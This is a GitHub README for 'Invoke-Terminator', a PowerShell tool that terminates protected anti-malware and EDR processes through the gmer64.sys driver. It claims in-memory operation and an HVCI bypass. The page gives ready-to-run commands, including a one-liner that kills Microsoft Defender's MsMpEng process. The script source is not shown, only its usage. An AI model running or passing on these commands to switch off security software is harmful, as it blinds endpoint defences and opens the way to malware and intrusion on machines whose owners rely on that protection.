Skip to content

Latest commit

 

History

History
52 lines (38 loc) · 1.81 KB

README.md

File metadata and controls

52 lines (38 loc) · 1.81 KB
Raw

Invoke-Terminator

xiosec - Terminator stars - Terminator forks - Terminator GitHub release License issues - Terminator

Terminator is a powershell script that terminates protected processes such as anti-malware and EDRs through the gmer driver.

  • in-memory
  • HVCI bypass

Usage

<#
----------------------------
        Terminator

github : github.com/xiosec
twitter: twitter.com/xiosec
----------------------------

* Arguments
    * -ServiceName
    * -ProcName
    * -ProcId
    * -driverPath
    * -AutoKill
#>

Invoke-Terminator -ServiceName terminator -ProcName MsMpEng

inline

powershell -c ". .\Invoke-Terminator.ps1; Invoke-Terminator -ProcName MsMpEng -AutoKill"

Example

In this example, we kill the MsMpEng process, which is related to the antimalware service. MsMpEng

Links

gmer64.sys

Blackout

License

Released under GPL-3.0 by @xiosec